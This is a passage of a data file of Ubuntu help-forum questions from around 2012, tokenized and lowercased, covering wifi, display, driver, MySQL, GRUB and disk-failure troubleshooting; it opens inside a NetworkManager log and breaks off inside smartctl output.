] : activation ( eth0 ) stage 2 of 5 ( device configure ) successful . nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) stage 3 of 5 ( ip configure start ) scheduled . nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) stage 2 of 5 ( device configure ) complete . nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) stage 3 of 5 ( ip configure start ) started ... nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 ] : ( eth0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 ] : dhclient started with pid 3062 nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) beginning ip6 addrconf . nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) stage 3 of 5 ( ip configure start ) complete . nov 29 22:06:37 a-thinkpad-t400 dhclient : internet systems consortium dhcp client 4.2.4 nov 29 22:06:37 a-thinkpad-t400 dhclient : copyright 2004-2012 internet systems consortium . nov 29 22:06:37 a-thinkpad-t400 dhclient : all rights reserved . nov 29 22:06:37 a-thinkpad-t400 dhclient : for info , please visit https : //www.isc.org/software/dhcp/ nov 29 22:06:37 a-thinkpad-t400 dhclient : nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 ] : ( eth0 ) : dhcpv4 state changed nbi - > preinit nov 29 22:06:37 a-thinkpad-t400 dhclient : listening on lpf/eth0/00:1c:25:98:6e:8a nov 29 22:06:37 a-thinkpad-t400 dhclient : sending on lpf/eth0/00:1c:25:98:6e:8a nov 29 22:06:37 a-thinkpad-t400 dhclient : sending on socket/fallback nov 29 22:06:37 a-thinkpad-t400 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 3 nov 29 22:06:38 a-thinkpad-t400 avahi-daemon [ 542 ] : joining mdns multicast group on interface eth0.ipv6 with address fe80 : :21c:25ff : fe98:6e8a . nov 29 22:06:38 a-thinkpad-t400 avahi-daemon [ 542 ] : new relevant interface eth0.ipv6 for mdns . nov 29 22:06:38 a-thinkpad-t400 avahi-daemon [ 542 ] : registering new address record for fe80 : :21c:25ff : fe98:6e8a on eth0.* . nov 29 22:06:40 a-thinkpad-t400 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 3 nov 29 22:06:43 a-thinkpad-t400 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 8 nov 29 22:06:51 a-thinkpad-t400 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 12 nov 29 22:06:57 a-thinkpad-t400 networkmanager [ 812 ] : ( eth0 ) : ip6 addrconf timed out or failed . nov 29 22:06:57 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... nov 29 22:06:57 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... nov 29 22:06:57 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . nov 29 22:07:03 a-thinkpad-t400 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 12 nov 29 22:07:15 a-thinkpad-t400 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 20 nov 29 22:07:22 a-thinkpad-t400 networkmanager [ 812 ] : ( eth0 ) : dhcpv4 request timed out . nov 29 22:07:23 a-thinkpad-t400 networkmanager [ 812 ] : ( eth0 ) : canceled dhcp transaction , dhcp client pid 3062 nov 29 22:07:23 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... nov 29 22:07:23 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) stage 4 of 5 ( ipv4 configure timeout ) started ... nov 29 22:07:23 a-thinkpad-t400 networkmanager [ 812 ] : ( eth0 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] nov 29 22:07:23 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) failed for connection 'auto ethernet' nov 29 22:07:23 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) stage 4 of 5 ( ipv4 configure timeout ) complete . nov 29 22:07:23 a-thinkpad-t400 networkmanager [ 812 ] : ( eth0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] nov 29 22:07:23 a-thinkpad-t400 networkmanager [ 812 ] : ( eth0 ) : deactivating device ( reason 'none ' ) [ 0 ] nov 29 22:07:23 a-thinkpad-t400 avahi-daemon [ 542 ] : withdrawing address record for fe80 : :21c:25ff : fe98:6e8a on eth0 . nov 29 22:07:23 a-thinkpad-t400 avahi-daemon [ 542 ] : leaving mdns multicast group on interface eth0.ipv6 with address fe80 : :21c:25ff : fe98:6e8a . nov 29 22:07:23 a-thinkpad-t400 avahi-daemon [ 542 ] : interface eth0.ipv6 no longer relevant for mdns .
224254	love2d graphics are not working	i sudo apt-getted ( grammar ftw ) love2d lua api , and when i try to run a game on my machine , it does n't work at all . when i use a simple love.graphics.print ( `` hello , world ! '' ) i get a blank screen , and i try re-creating the font and this still does nothing . however , love2d still works for me on my other computer with ms-windows 7 . the terminal output does n't help at all , everything is showing up fine . and , when i use a conf.lua file to manually set the title to something , it does n't work . would that be because of dependency errors ? or am i maybe missing a driver ?
224255	how to benchmark a software 's performance	how can i benchmark the performance of a particular software not complete system ? i know various tools are available for system benchmarking . but i want to benchmark the performance of a particular software for example truecrypt . i want to know what time and cpu usage does different operations ( like encryption , decryption , mounting , reading and writing of files etc . ) in truecrypt takes . i want to do this to compare the performances of different software . can someone suggest a open source tool or any tool for linux platform that can do this ? thanks ,
224256	system very slow after upgrading to 12.10	after upgrading to 12.10 my system slowed down considerably . how can i make a new installation from scratch without loosing my adjustments ? i have a dualboot system and a partition with all my personal files and data .
224259	can i install ubuntu on p4 machine with windows xp	sorry for the question , but i am the new guy with ubuntu and dying to install it in my old pc . and just wanted to confirm that can i install it on my p4 , 1gb ram , intel 82845 graphic controller machine or it 's going to need more then this thanks in advance .
224260	how to deal with problems with xfce ?	i am using xfce 4.8 on ubuntu 12.04 . any choice of desktop environment starts xfce . i do n't get any splash screen nor xfce session selector nor wifi icon , neither the option to restart/shutdown . last night i closed the session normally and today i found many problems : no matter whether i try to start session on unity , gnome , gnome-classic , mate , etc , it always start xfce . it does n't even show the xfce session selector nor the splash screen . it does n't start the freemeteo screenlet . orage starts up automatically . wifi icon is missing ( but i 'm connected to the net ) . on the user menu , `` suspend '' and `` shut down '' are greyed out . `` logout '' is enabled , but when i click on it , it gives me the following error : the name org.xfce.sessionmanager was not provided by any .service files edit : the last package i had installed before this started was xfce4-utils . i ca n't open synaptic package manager to uninstall it or to find broken packages . synaptic does n't start . i do n't know what to do . i 'm still new to xfce . any ideas ?
224262	how can i make windows minimize using middle mouse button on title bar in xubuntu ?	running ubuntu 12.10 with xubuntu-desktop . would like window to minimize if i middle-click on its title bar . ca n't find any setting for this . is it possible ?
224264	nautilus slow on ubuntu 12.10	since i installed ubuntu 12.10 i noticed that nautilus is a bit slow . especially when switching between windows loading is not instantaneous but i have to wait about 2 seconds to change the window . what might be the problem ? how can i fix ?
224266	how to find packages recently uploaded to the ubuntu repository	i 've recently used reprepro to set up a mirror of the official ubuntu repository for one architecture and one release ( precise in this case ) . please note how in conf/distributions i define one repository that the clients on my network will reference and in conf/updates i pull all components into it ( including updates and security ) . if doing it this way ( everything pulled into a single local repository ) is n't a good practice , i 'm open to suggestions ( i have n't mirrored ubuntu before ) . however - i know that in order to keep the repository up to date , it is suggested that we pull in changes from the upstream every 6 hours ( exactly as for debian ) . i do n't know how often the updated packages are uploaded to the upstream repos and that 's probably the reason why i 'm worried that the local repo update might be missing some packages that had already been uploaded to the upstream . i 'd like to get a list of packages recently uploaded to the upstream to verify whether my mirror is working correctly and the message i 'm getting during the local repository update : nothing to do found . ( use -- noskipold to force processing ) is n't anything to be worried about . is it safe to just rely on the fact that if the release.gpg is n't changed since the last pull , there 's really nothing to do ? is there a way to find such list/history of uploads ? here 's my reprepro repository configuration : conf/distributions : origin : ubuntu label : ubuntu suite : precise version : 12.04 codename : precise architectures : amd64 components : main restricted universe multiverse description : ubuntu precise 12.04 + updates + security update : - precise precise-updates precise-security log : update.log conf/updates : name : precise architectures : amd64 components : main restricted universe multiverse method : http : //archive.ubuntu.com/ubuntu verifyrelease : 40976eaf437d05b5 name : precise-updates architectures : amd64 suite : precise-updates components : main restricted universe multiverse method : http : //archive.ubuntu.com/ubuntu verifyrelease : 40976eaf437d05b5 name : precise-security architectures : amd64 suite : precise-security components : main restricted universe multiverse method : http : //security.ubuntu.com/ubuntu verifyrelease : 40976eaf437d05b5
224268	steam ( using wine ) starting civ 5 on the wrong screen	i have my left screen set as primary screen in ubuntu ( unity ) and most things just do what they are supposed to do when they are fullscreen . they run on my primary screen . but for some reason when i launch civ 5 from steam ( using wine , not the new beta ) it fullscreens to my second ( smaller ) screen . how can i make this game appear fullscreen on my primarry screen ? i am using the fglrx-updates driver that ubuntu provides .
224273	how to select a wifi ap depending of the user login	i have kids at home , i need to find a way to start the wifi connexion based on who is login in : kids = > use access point ssid : child adult = > use access point ssid : adult lubuntu 12.04 lts regards and thank you in advance for your help .
224274	when using dual monitors , some software maximize only into the primary display ?	when using multiple displays in ubuntu , if i try to maximize some applications while in the secondary display , the application will move to the primary display and then maximize . i just checked whether only the apps executed in the secondary display can be maximized in it . but its not true . first when i opened gedit in the primary display , i took it to the other display and maximized . it went back to the primary display . then i again opened a new gedit and tried to do the same thing . now it maximized in the secondary display . why is this happening ? how to fix it ? ps : apps like chrome are also effected
224276	ubuntu way to run sysctl -p on each boot ?	i made some changes to sysctl.conf but now need to run sysctl -p on each boot . i can always create an init script to have it run automatically on boot , but i was wondering if there was an ubuntu / debian way of doing it .
224287	fast forward/reverse or jump to specific time in video minidlna streamed content to tv	i am successfully using minidlna to stream content between my ubuntu 12.04 laptop and a samsung smart tv with allshare system . the only problem i see is that there is no way to jump to a specific point to a video . for example , if i want to fast forward to half way of a video that is being streamed , how can i do that ?
224291	make sniqt recognize all tray abilities ( or create a working indicator in qt )	there is this old thread of mine : how do i create a working indicator with qt/c++ ? where i was suggested to use the qsystemtray library for making a tray icon in ubuntu for my application . sniqt is a program that takes care of the rest . as known , ubuntu has got rid of tray icons . instead , it now uses indicators and only indicators . sniqt converts the qt tray icons into working indicators . the problem is that it does n't do a very decent convertion . actions like single click , middle click etc do not work , while they do in systems that support tray icons . is there a way to have these actions back ? can i use qsystemtray icon and still have these interesting ( and very helpful , in my occasion ) actions in ubuntu ? i would be glad to know the answer to the other thread i talked about earlier ( how to make a working indicator using the gtk libraries and prevent the crash ) , as well . link for sniqt bug : https : //bugs.launchpad.net/sni-qt/+bug/1027652
224293	installation issue after 4 attempts	i have successfully installed ubuntu 12.10 on 2 laptops , one running vista & one running windows8 . i also made four seperate attempts ( long downloads of wubi.exe ) to different hard drives but each time i had no success . the machine is an older machine with windows2000professional installed and running . the system has three hard drives ; c : ( 20.5 gb with 7.26gb free ) , d : ( 74.5 gb with 33.1 gb free ) , & e : ( 35.3 gb with 24.8 gb free ) which all have gigabytes space available ; also an a : 3 1/2floppy drive and a cd-drive burner . the cpu processor is older but seems sufficient : amd athlon xp 1700+ and the task manager of windows2000 shows the processor works fine.. the flat-screen display works fine . here is the error message i receive each time the 'installation configuration ' is verified : no root file system is defined please correct this from partitioning menu the ubuntu operating system is allowing me a couple of options at the very top right menu . i was able to establish a wireless connection but the main homepage wo n't load with firefox app or any other apps . i can not access or even find any 'partitioning menu '' from the displayed page . i can not access files or windows explorer to view drives since i 'm not using the windows o/s . if i try to go back & re-install the ubuntu 12.10 again , it always asks me to uninstall the one found on the hd & then i run wubi.exe again which takes a long time for the download . do i need to go back into windows2000 & use windows explorer to look at the file structure and add a partition ? on previous attempts i have tried loading the wubi.exe on all three drives ; c : d : and e : .
224295	beginner help for usb start	i tried to try ubuntu from a flash drive but after i selected my language and said try it just is on a blank screen with the normal background . i can do the thing where you do ctrl +alt + f # but i do n't have an idea of what to do .
224296	how do you find libraries ( c++ ) in ubuntu ?	sorry this is such a beginner question , but i 've recently begun programming with c++ on ubuntu 12.10 and i 've installed a few libraries i need to work with , for example pcl and i ca n't find them to add them to my project , i 'm using qtcreator as the ide and qmake which comes with it . for example with pcl i followed the instructions on their site : sudo add-apt-repository ppa : v-launchpad-jochen-sprickerhof-de/pcl sudo apt-get update sudo apt-get install libpcl-all and as no problems occurred i have to assume they are correctly installed . most of the tutorial dealing with adding external libraries i 've found on the web assume you 're on windows and know where you downloaded the library . since i do n't have experience with adding external libraries in c++ , could someone please tell me in what file , if there is one , are libraries installed by default in ubuntu ? what is the extension of these library files ? is there a script/command which can help detect a library or all the libraries installed ?
224297	windows move to external monitor when re-opening lid	i 'm using cinnamon ( on 12.10 ) on a laptop ( compaq 6710b business model ) with an external monitor . both screens run at 1680 x 1050 , the external monitor is located on the right . during normal operation everything works fine ; windows open in whatever monitor my mouse pointer is when they open and i can freely drag them to the other monitor . when i close the lid of my laptop both displays shut down as expected . when i open the lid , however , the lock window opens on the external monitor and any windows that were open on the laptop screen have moved to the external monitor as well . nothing happens between closing the lid and opening it ; no suspend , powerdown , hibernate or anything , monitor stays attached ; even mouse is untouched ( pointer on laptop screen ) . is there any way to fix it so my windows stay on whatever monitor i left them before closing the lid ? alternative solutions are welcome . addendum ; if the laptop suspends while the lid is closed and it 's brought up again , the windows do stay correct . this problem seems to happen when the lid is opened while still running instead of when closing the lid .
224298	mysql not starting	i have a server running on rackspace.com , it been running for about a year ( collecting data for a project ) and no problems . now it seems mysql froze ( could not connect either through ssh command line , remote app ( sequel pro ) or web ( pages using the db just froze ) . i got a bit eager to fix this quick and rebooted the virtual server , running ubuntu 10.10 . it is a small virtual lamp server ( 10gig storage - i 'm only using 1 , 256mb ram -has not been a problem ) . now after the reboot , i can not get mysql to start again . service mysql status mysql stop/waiting i believe this just means mysql is not running . how do i get this running again ? service mysql start start : job failed to start no . just typing 'mysql ' gives : mysql error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 111 ) there is a .sock file in this folder , ls -l gives : srwxrwxrwx 1 mysql mysql 0 2012-12-01 17:20 mysqld.sock i need the data in the database ( so i 'd like to avoid reinstalling ) , and i need it back up running again . all hint , tips and solutions are welcomed and appreciated .
224299	burn mp4 to cd in ubuntu 12.04	i have an mp4 file ( 115,8 mb ) . i want to burn it to a sony cd-r ( 700 mb ) to watch on tv . i tried to do it with devede from ubuntu software center but it always give me this error : '' conversion failed . it seems a bug of mencoder . '' can anyone tell me an other method to burn my mp4 to cd ? or can anyone tell me how to fix devede 's error ? i use a toshiba computer ( 64 bit ) with windows 7 home premium and ubuntu 12.04 lts ( installed via wubi.exe ) . thx .
224300	first time using ubuntu , need help with drivers !	i have just successfully built my first computer last night . i went through the boot menu and got ubuntu 12.10 installed properly and everything . my question is ... now what ? there has to be some sort of drivers i need to install right ? i ca n't connect to wi-fi or anything of that sort . i have an asus motherboard , model number m4n98td evo , and an nvidia geforce gtx 650 grpahics card . i guess my main question is , can someone run me through step by step what i need to do after i install ubuntu ?
224302	problems after update with libdrm	i 've got problem with updating . sorry for polish language in log , but it is default language in my system . i 'm using ubuntu 12.04 gnome remix . anybody know how to fix it ? należy uruchomić `` apt-get -f install '' , aby naprawić poniższe problemy : następujące pakiety mają niespełnione zależności : libdrm-dev : wymaga : > ( = 2.4.40+git20121123.171666e4-0ubuntu0ricotz2~precise ) ale > 2.4.32-1ubuntu1 ma zostać zainstalowany libdrm-intel1 : wymaga : libdrm2 ( > = 2.4.38 ) ale 2.4.32-1ubuntu1 ma zostać zainstalowany libdrm-nouveau2 : wymaga : libdrm2 ( > = 2.4.38 ) ale 2.4.32-1ubuntu1 ma zostać zainstalowany libdrm-radeon1 : wymaga : libdrm2 ( > = 2.4.38 ) ale 2.4.32-1ubuntu1 ma zostać zainstalowany libdrm2 : narusza zależności : libdrm2 : i386 ( ! = 2.4.32-1ubuntu1 ) ale > 2.4.40+git20121123.171666e4-0ubuntu0ricotz2~precise ma zostać zainstalowany libdrm2 : i386 : narusza zależności : libdrm2 ( ! = 2.4.40+git20121123.171666e4- > 0ubuntu0ricotz2~precise ) ale 2.4.32-1ubuntu1 ma zostać zainstalowany you should run `` apt-get-f install '' to fix the following problems : the following packages have unmet dependencies : libdrm-dev : depends : > ( = 4.2.40 + git20121123.171666e4-0ubuntu0ricotz2 ~ precise ) but > 2.4.32-1ubuntu1 is to be installed libdrm-intel1 : requires : libdrm2 ( > = 2.4.38 ) but 2.4.32-1ubuntu1 is to be installed libdrm-nouveau2 : requires : libdrm2 ( > = 2.4.38 ) but 2.4.32-1ubuntu1 is to be installed libdrm -radeon1 : requires : libdrm2 ( > = 2.4.38 ) but 2.4.32-1ubuntu1 is to be installed libdrm2 : depending violates : libdrm2 : i386 ( ! = 2.4.32-1ubuntu1 ) but > 4.2.40 + git20121123.171666e4-0ubuntu0ricotz2 ~ precise to be installed libdrm2 : i386 : depending violates : libdrm2 ( ! = 2.4.40 + git20121123.171666e4- > 0ubuntu0ricotz2 ~ precise ) but 2.4.32-1ubuntu1 is to be installed
224306	is server alive app	i 'm just wondering , is there an ubuntu program to check if certain ip 's are up ? i have a few servers and i 'm searching for a small program\app\indicator to ping\telnet\tcp-connect my servers and tell me by notification or email if they are up or down .
224307	sound not working for uid=1003 but working fine for uid=1000	sounds works for uid=1000 , but not for the main user on the system , running with uid=1003 . upon boot , the ubuntu chime clearly plays . when the user is logged in , sound test shows no input device . i looked at several of the previous questions , added the user to audio , video , pulse , pulse-access -- - but still no luck . to recap : this worked perfectly in 11.04 , 11.10 , 12.04 . it works for the default user uid=1000 , it does not work for the actual user . the differing group memberships are mainly for adm , admin , sudo and the like . edit : some exploring confirms that it is local to the user and machine ; on a second box it works fine . so somewhere below ~/.gconf/ a toggle must have been flipped . and yes , reset alsamixer , reset mute button -- all to no avail .
224311	error trying to install my webcam	i downloaded the `` gspca '' video for linux ( v4l1 ) driver but when i tried to compile it , the terminal showed the following error : $ cd gspcav1-20071224/ $ ~/gspcav1-20071224 $ ./gspca_build bash : ./gspca_build : permission denied i have no clue why i do n't have permission in my own machine .
224312	ubuntu font is wrong in kubuntu 12.10	after upgrading from kubuntu 12.04 to kubuntu 12.10 , i have a peculiar and very specific font problem . my default font all along has been ubuntu 11 . now it shows up as bolded -- that is , ubuntu bold 11 and ubuntu regular 11 look exactly the same . i do n't see this for any other size of the ubuntu font -- for ubuntu 10 and ubuntu 12 , for instance , the regular font is thinner than the bold font , as it should be . i 've reinstalled the ttf-ubuntu-font-family package , but that has n't made any difference .
224314	problem connecting to internet	hey guys i just got ubuntu 12.10 and i have no idea how to use it . i ca n't get my wifi to work . i click on the wifi-ish signal on the top right corner but it does n't show anything about a wifi connection . i have enabled networking . the button to switch on my wifi does n't do anything . i probably do n't have the right driver , but if so , how do i download it ? and which one ?
224315	issues connecting to wifi	i am having trouble with my wifi connection . i have two laptops , and i have just installed ubuntu for the first time on both of them . with the first one i just put in the password and it instantly logged to wifi ! the second one was not the same , i am prompted to enter the password and it doesnt connect , it seems that it doesnt recognize the password as correct ( but it is ) settings are the same on both computers , i have tried many suggestions from the forum but nothing seems to work , help ! ! ! ! thanks
224316	linux-compatible laptop	i am planning to replace my current laptop ( dell inspiron with core ii due ) with a new one . when i bought my current one dell was the best choice as a linux friendly machine , and i am using it as my main computer since than . i am planning to get a new machine with more more memory , power and disk space , but wondering which brand and model should i choose . please note that laptops equipped with linux preinstalled are very rarely exists here in israel , and most models come with oem windows and not linux or freedos . also , my budget is tight and i prefer not to spend too much money when unnecessary .
224318	how to personalize number/arrangement of workspaces ?	i want to set 6 horizontal workspaces on my ubuntu 12.04 with unity . the `` solutions '' suggested here and here do not allow me to arrange them in complete horizontal fashion . i remember doing this in a previous version of ubuntu with unity but i could n't find the right option in the system settings or compizconfig settings manager .
224328	how to see real time updates of file system at terminal ?	i am studying git and how it works with file system . i installed application called terminator , which allows me to open multiple terminals . i want to run git commands at the left terminal and want to see at right terminal real time updates of file system . how it is possible ?
224329	how to fully maximize window in xubuntu by dragging title bar to top edge ?	in xubuntu 12.10 , i am able to drag a window title bar to the top of the screen and it will maximize , but it will only maximize the top half of the display . is there a way so it maximizes to the full screen like in ubuntu ?
224330	internet does not work continuously after upgrading from 11.04 to 11.10	i upgraded from ubuntu 11.04 to 11.10 but this resulted in some internet problem in my pc . whenever i connect it to some network , internet works fine for some time and then stops working for some time then again works . it goes on continuously . i tried to find solution on google but could not get any related problem . i have both lan and wifi connectivity using a proxy server and this problem occurs with both . any help in this regard will be appreciated .
224331	snap feature in ubunt 12.04 does not work	i can not get the snap feature to work . the settings are all enabled in compizconfig , but they do not work . they do n't work with either my touchpad or my mouse , and i tried to set up buttons to do it , such as super key and left arrow , but that did n't work either .
224333	why does ubuntu not detect my sd card ?	i ca n't mount my sd card . i 'm using ubuntu 12.04 lts on an asus k55v ( intel ) , and i have a sd card slot , but ubuntu does n't detect when i put a sd card in the slot . not ubuntu nor other program .
224335	install gnome extensions through website : security vulnerability ?	i found a gnome extension through a google search ( using chromium ) , and was very surprised that i could simply toggle the on/off switch to have the website install a full gnome extension on my computer without any other manual steps involved . ( tested , this works with firefox as well . ) granted , it does pop up a dialog box asking me to confirm installation , but ... while this is great for ease of use and usability , are n't there security vulnerabilities with this ? i would be interested in knowing how exactly this feature works , and whether i should be concerned about any `` backdoors '' that this might allow for hackers to easily install executables on my machine . are the extensions on the gnome site vetted ? is there a way to tell whether extensions are safe or not ? are the chromium and firefox browsers modified by gnome in order to allow for this feature ? are there any other custom gnome chromium/firefox changes that users should know about ? update : having understood how this works , i now believe this is a really great feature especially for non-technical users , but it did alarm me a little when i first encountered it .
224336	grub error ( 2 ) while booting ubuntu 12.04	i have installed ubuntu 12.04 on my computer . the install went fine but now i have the next error while booting : grub stage 1.5 - error 2 i 'm posting from the live cd and i did n't find an useful answer in google .
224340	problems installing adobe flash player ?	whenever i try installing something i get a error . in a terminal i always get some error . in the software center fails . it tells me to check my internet connection , even when i have an ethernet cable attached to the wi-fi router . when i try to download with the browser , opening the with the archive manager or saving it happens the same . i 've even tried to use flash-aid . there seems to be a problem with my proxy or something . i somehow managed to install adobe reader but i do n't actually know how . i 've read step by step guides but they use computer jargon that i ca n't understand .
224342	change window manager 's alt+drag	tumblr uses alt+click to reblog , but compiz uses alt+drag to move windows . this is convenient for some , but i have literally never used compiz 's alt+drag and would like to disable it . how can i get rid of the alt+click+drag function without disabling alt completely ? this is different from this question because i would like to disable this functionality , not move it to the super key .
224347	terminator transparency not showing other opened windows but only wallpaper	terminator transparency not working after upgrading to ubuntu 11.10 . at zero slider it is becoming completely black and at max slider its showing wallpaper background rather than background containing other opened windows .
224348	error : could n't read file-kernel panic	i have just installed ubuntu 12.04.1 . to be honest i had to run installation several times until it was finished fine . when i finally managed to install it properly , i power on the laptop and the grub shoed up ! i selected ubuntu generic . it takes some time to load and when it does i get an error message stating that error : could n't read file press any key to continue if i press any button nothing happens . if a leave it there , in a short while there is a black screen loading which gives some weird messages [ 0.946710 ] kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) [ 0.946755 ] pid : 1 , comm : swapper/0 not tainted 3.2.0-29-generic # 46-ubuntu [ 0.946792 ] call trace : [ 0.946831 ] [ < ffffffff81640ec8 > ] panic+0x91/0x1a4 [ 0.946869 ] [ < ffffffff81cfc01e > ] mount_block_root+0xdc/0x18e [ 0.946909 ] [ < ffffffff81002930 > ] ? populate_rootfs_wait+0x300/0x9d0 [ 0.946947 ] [ < ffffffff81cfc257 > ] mount_root+0x54/0x59 [ 0.946982 ] [ < ffffffff81cfcec9 > ] prepare_namespace+0x16d/0x1a6 [ 0.947019 ] [ < ffffffff81cfbd63 > ] kernel_init+0x153/0x158 [ 0.947094 ] [ < ffffffff81cfbc10 > ] ? start_kernel+0x3bd/0x3bd [ 0.947129 ] [ < ffffffff81664030 > ] ? gs_change+0x13/0x13 the thing is that the laptop is n't mine . a friend tried to dual boot ubuntu alongside windows 7 but he did n't succeed . ubuntu option was in grub , but when you tried to boot it rebooted from the start . so from a live cd i erased ubuntu , started windows to check if something went wrong , and fortunately everything was ok. windows started normally ! so i tried to install ubuntu . before installation was completed the installer crashed ! i was afraid that he would lost windows , something that was true ... at that point i tried to install windows but whichever distro ( xp , 7 { home , proffessional , ultimate } ,8 ) i tried it could never reach the end . so i tried to reinstall ubuntu but i was facing those weird messages . what can i do to move on ? ______________________________________________________________________ edit1 : i tried to check and fix ( if possible ) with gparted it took a lot of hours , although gparted displays only 01:14 , i restarted the system and now i get not exactly the same messages . numbers in braces [ ] are different [ 0.818189 ] kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) [ 0.818235 ] pid : 1 , comm : swapper/0 not tainted 3.2.0-29-generic # 46-ubuntu [ 0.818272 ] call trace : [ 0.818312 ] [ < ffffffff81640ec8 > ] panic+0x91/0x1a4 [ 0.818351 ] [ < ffffffff81cfc01e > ] mount_block_root+0xdc/0x18e [ 0.818391 ] [ < ffffffff81002930 > ] ? populate_rootfs_wait+0x300/0x9d0 [ 0.818428 ] [ < ffffffff81cfc257 > ] mount_root+0x54/0x59 [ 0.818464 ] [ < ffffffff81cfcec9 > ] prepare_namespace+0x16d/0x1a6 [ 0.818501 ] [ < ffffffff81cfbd63 > ] kernel_init+0x153/0x158 [ 0.818574 ] [ < ffffffff81cfbc10 > ] ? start_kernel+0x3bd/0x3bd [ 0.818610 ] [ < ffffffff81664030 > ] ? gs_change+0x13/0x13 what on earth is going on ? ______________________________________________________________________ edit2 : i forgot to mention that my friend gave a punch to his laptop during a game . after that his cooler became to make a weird noise so i checked and it is a bit tortuous but it is working . what i beleive must be wrong is that his hdd makes a weird noise while trying to load ubuntu , which means he might need a new hdd . could that be true ? ______________________________________________________________________ edit3 : i tried something else : ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00059d92 device boot start end blocks id system /dev/sda1 2048 204802047 102400000 83 linux /dev/sda2 204802048 208898047 2048000 82 linux swap / solaris /dev/sda3 * 208898048 488396799 139749376 7 hpfs/ntfs/exfat disk /dev/sdb : 3909 mb , 3909091328 bytes 19 heads , 24 sectors/track , 16743 cylinders , total 7634944 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6765e7ab device boot start end blocks id system /dev/sdb1 * 64 1421911 710924 17 hidden hpfs/ntfs i did this and then i checked to see if there is something faulty and guess what ... .. ubuntu @ ubuntu : ~ $ sudo smartctl -a /dev/sda1 smartctl 5.41 2011-06-09 r3365 [ x86_64-linux-3.2.0-29-generic ] ( local build ) copyright ( c ) 2002-11 by bruce allen , http : //smartmontools.sourceforge.net === start of information section === model family : toshiba 2.5 '' hdd mk..52gsx device model : toshiba mk2552gsx serial number : x8aet3v2t lu wwn device id : 5 000039 151683321 firmware version : lv010a user capacity : 250,059,350,016 bytes [ 250 gb ] sector size : 512 bytes logical/physical device is : in smartctl database [ for details use : -p show ] ata version is : 8 ata standard is : exact ata specification draft version not indicated local time is : sun dec 2 17:24:29 2012 utc smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x00 ) offline data collection activity was never started . auto offline data collection : disabled . self-test execution status : ( 0 ) the previous self-test routine completed without error or no self-test has ever been run . total time to complete offline data collection : ( 120 ) seconds . offline data collection capabilities : ( 0x5b ) smart execute offline immediate . auto offline data collection on/off support . suspend offline collection upon new command . offline surface scan supported . self-test supported . no conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 2 ) minutes . extended self-test routine recommended polling time : ( 118 ) minutes . sct capabilities : ( 0x0039 ) sct status supported . sct error recovery control supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 16 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x000b 100 100 050 pre-fail always - 0 2 throughput_performance 0x0005 100 100 050 pre-fail offline - 0 3 spin_up_time 0x0027 100 100 001 pre-fail always - 1554 4 start_stop_count 0x0032 100 100 000 old_age always - 3778 5 reallocated_sector_ct 0x0033 075 075 050 pre-fail always - 1898 7 seek_error_rate 0x000b 100 100 050 pre-fail always - 0 8 seek_time_performance 0x0005 100 100 050 pre-fail offline - 0 9 power_on_hours 0x0032 078 078 000 old_age always - 8805 10 spin_retry_count 0x0033 175 100 030 pre-fail always - 0 12 power_cycle_count 0x0032 100 100 000 old_age always - 3533 192 power-off_retract_count 0x0032 100 100 000 old_age always - 281 193 load_cycle_count 0x0032 092 092 000 old_age always - 86093 194 temperature_celsius 0x0022 100 100 000 old_age always - 32 ( min/max 13/50 ) 196 reallocated_event_count 0x0032 100 100 000 old_age always - 140 197 current_pending_sector 